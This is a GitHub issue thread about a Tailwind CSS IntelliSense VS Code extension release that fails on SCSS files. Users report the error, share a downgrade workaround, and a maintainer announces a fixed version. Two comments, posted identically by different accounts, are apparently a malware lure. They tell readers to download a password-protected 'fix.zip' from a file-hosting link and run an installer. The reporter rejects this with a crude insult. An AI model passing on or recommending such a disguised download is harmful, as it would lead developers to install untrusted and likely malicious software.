### ISSUE TITLE
[pre-release] intellisense broken since 0.13.29

### ISSUE THREAD

**Issue by joy-yu** [tailwindlabs/tailwindcss-intellisense#1035]
**What version of VS Code are you using?**

1.92.2

**What version of Tailwind CSS IntelliSense are you using?**

0.13.31

**What version of Tailwind CSS are you using?**

3.4.10

**plugin output**

```js
[Error - 11:33:33] Failed to initialize workspace folder /Users/apple/Desktop/app-organization e [CssSyntaxError]: /Users/apple/Desktop/app-organization/src/styles/base.scss:50:6: Unknown word
You tried to parse SCSS with the standard CSS parser; try again with the postcss-scss parser
    at qd.error (/Users/apple/.vscode/extensions/bradlc.vscode-tailwindcss-0.13.29/dist/tailwindServer.js:195:35103)
    at jw.unknownWord (/Users/apple/.vscode/extensions/bradlc.vscode-tailwindcss-0.13.29/dist/tailwindServer.js:201:7868)
    at jw.decl (/Users/apple/.vscode/extensions/bradlc.vscode-tailwindcss-0.13.29/dist/tailwindServer.js:201:3437)
    at jw.other (/Users/apple/.vscode/extensions/bradlc.vscode-tailwindcss-0.13.29/dist/tailwindServer.js:201:5838)
    at jw.parse (/Users/apple/.vscode/extensions/bradlc.vscode-tailwindcss-0.13.29/dist/tailwindServer.js:201:6593)
    at O0 (/Users/apple/.vscode/extensions/bradlc.vscode-tailwindcss-0.13.29/dist/tailwindServer.js:201:8182)
    at new e (/Users/apple/.vscode/extensions/bradlc.vscode-tailwindcss-0.13.29/dist/tailwindServer.js:204:1635)
    at Jc.process (/Users/apple/.vscode/extensions/bradlc.vscode-tailwindcss-0.13.29/dist/tailwindServer.js:204:9554)
    at e.resolveSourceDirectives (/Users/apple/.vscode/extensions/bradlc.vscode-tailwindcss-0.13.29/dist/tailwindServer.js:1283:16417)
    at /Users/apple/.vscode/extensions/bradlc.vscode-tailwindcss-0.13.29/dist/tailwindServer.js:1283:13635 {
  reason: 'Unknown word',
  file: '/Users/apple/Desktop/app-organization/src/styles/base.scss',
  source: '  \n' +
    '                \n' +
    '  \n' +
    '\n' +
    '@tailwind base;\n' +
    '@tailwind components;\n' +
    '@tailwind utilities;\n' +
    '\n' +
```

**Describe your issue**

Everything is fine with version 0.13.28.
Does pre-release version have destructive updates that make it incompatible with tailwind 3.x?

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by joy-yu** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Are you robot? Go eat shit

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Pzzzeed** [comment]
v0.12.7 also not fine (same error), I use with my Angular project which quite a lot of folder of component. But everything is fine with version 0.12.6

**Comment by wm-simon** [comment]
v0.12.7 is not working here too. After downgrading to 0.12.6 it worked again.

**Comment by benlieb** [comment]
Not working for me either...

**Comment by lirobinxc** [comment]
Same here, same error. Reverting to `0.12.6` fixes it for now.

**Comment by gioacostax** [comment]
Same here, 0.12.7 is broken

**Comment by Seiyial** [comment]
If anyone doesn't yet know how to revert on VSCode, to save you a google search:

To revert to `0.12.6`, go to the VSCode Extensions list, search for/find "Tailwind CSS Intellisense", right click the tile and select "Install Specific Version"

**Comment by yeasir2148** [comment]
Can confirm, 12.7 is borken. I lost one whole day trying to fix thinking someone in the team introduced something that broke the extension. Hope this will be fixed soon.

**Comment by mhfed** [comment]
> If anyone doesn't yet know how to revert on VSCode, to save you a google search:
> 
> Go to the VSCode Extensions list, search for/find "Tailwind CSS Intellisense", right click the tile and select "Install Specific Version"

It works

**Comment by williamhibberd** [comment]
Thank you for this thread. I have been struggling to find a fix for days. Reverting to Tailwind CSS IntelliSense version v0.12.6 has worked.

**Comment by philipp-spiess** [comment]
Hey @joy-yu! Thanks for reporting this and sorry for the troubles! We just release v0.12.8 of the VS Code extension with a fix that resolves this issue. If you still have issues, please let us know!

**Comment by benlieb** [comment]
🥳 🥳 🥳 🥳 🥳 🥳 🥳 🥳 🥳 🥳
